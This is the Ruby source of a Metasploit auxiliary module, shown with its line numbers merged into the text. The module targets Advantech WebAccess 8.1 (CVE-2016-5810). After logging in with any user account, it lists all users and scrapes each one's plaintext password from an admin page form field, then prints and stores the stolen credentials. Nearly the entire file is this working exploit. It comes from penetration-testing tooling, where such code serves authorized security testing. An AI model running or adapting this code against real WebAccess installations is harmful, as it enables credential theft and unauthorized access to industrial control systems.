Path: blob/master/modules/auxiliary/gather/advantech_webaccess_creds.rb
19715 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Auxiliary6include Msf::Exploit::Remote::HttpClient78def initialize(info = {})9super(10update_info(11info,12'Name' => "Advantech WebAccess 8.1 Post Authentication Credential Collector",13'Description' => %q{14This module allows you to log into Advantech WebAccess 8.1, and collect all of the credentials.15Although authentication is required, any level of user permission can exploit this vulnerability.1617Note that 8.2 is not suitable for this.18},19'License' => MSF_LICENSE,20'Author' => [21'h00die', # Pointed out the obvious during a PR review for CVE-2017-515422'sinn3r', # Metasploit module23],24'References' => [25['CVE', '2016-5810'],26['URL', 'https://github.com/rapid7/metasploit-framework/pull/7859#issuecomment-274305229']27],28'DisclosureDate' => '2017-01-21',29'Notes' => {30'Reliability' => UNKNOWN_RELIABILITY,31'Stability' => UNKNOWN_STABILITY,32'SideEffects' => UNKNOWN_SIDE_EFFECTS33}34)35)3637register_options(38[39OptString.new('WEBACCESSUSER', [true, 'Username for Advantech WebAccess', 'admin']),40OptString.new('WEBACCESSPASS', [false, 'Password for Advantech WebAccess', '']),41OptString.new('TARGETURI', [true, 'The base path to Advantech WebAccess', '/']),42]43)44end4546def do_login47vprint_status("Attempting to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")4849uri = normalize_uri(target_uri.path, 'broadweb', 'user', 'signin.asp')5051res = send_request_cgi({52'method' => 'POST',53'uri' => uri,54'vars_post' => {55'page' => '/',56'pos' => '',57'username' => datastore['WEBACCESSUSER'],58'password' => datastore['WEBACCESSPASS'],59'remMe' => '',60'submit1' => 'Login'61}62})6364unless res65fail_with(Failure::Unknown, 'Connection timed out while trying to login')66end6768if res.headers['Location'] && res.headers['Location'] == '/broadweb/bwproj.asp'69print_good("Logged in as #{datastore['WEBACCESSUSER']}")70report_cred(71user: datastore['WEBACCESSUSER'],72password: datastore['WEBACCESSPASS'],73status: Metasploit::Model::Login::Status::SUCCESSFUL74)75return res.get_cookies.scan(/(ASPSESSIONID\w+=\w+);/).flatten.first || ''76end7778print_error("Unable to login as '#{datastore['WEBACCESSUSER']}:#{datastore['WEBACCESSPASS']}'")7980nil81end8283def get_user_cred_detail(sid, user)84vprint_status("Gathering password for user: #{user}")8586uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'upAdminPg.asp')8788res = send_request_cgi({89'method' => 'GET',90'uri' => uri,91'cookie' => sid,92'vars_get' => {93'uname' => user94}95})9697unless res98print_error("Unable to gather password for user #{user} due to a connection timeout")99return nil100end101102html = res.get_html_document103pass_field = html.at('input[@name="Password"]')104105pass_field ? pass_field.attributes['value'].text : nil106end107108def get_users_page(sid)109vprint_status("Checking user page...")110111uri = normalize_uri(target_uri.path, 'broadWeb', 'user', 'AdminPg.asp')112113res = send_request_cgi({114'method' => 'GET',115'uri' => uri,116'cookie' => sid117})118119unless res120fail_with(Failure::Unknown, 'Connection timed out while checking AdminPg.asp')121end122123html = res.get_html_document124125users = html.search('a').map { |a|126Rex::Text.uri_decode(a.attributes['href'].text.scan(/broadWeb\/user\/upAdminPg\.asp\?uname=(.+)/).flatten.first || '')127}.delete_if { |user| user.blank? }128129users130end131132def report_cred(opts)133service_data = {134address: rhost,135port: rport,136service_name: 'webaccess',137protocol: 'tcp',138workspace_id: myworkspace_id139}140141credential_data = {142origin_type: :service,143module_fullname: fullname,144username: opts[:user],145private_data: opts[:password],146private_type: :password147}.merge(service_data)148149login_data = {150last_attempted_at: DateTime.now,151core: create_credential(credential_data),152status: opts[:status],153proof: opts[:proof]154}.merge(service_data)155156create_credential_login(login_data)157end158159def run160cookie = do_login161users = get_users_page(cookie)162163users.each do |user|164pass = get_user_cred_detail(cookie, user)165166if pass167report_cred(168user: user,169password: pass,170status: Metasploit::Model::Login::Status::SUCCESSFUL,171proof: 'AdminPg.asp'172)173174print_good("Found password: #{user}:#{pass}")175end176end177end178end179180181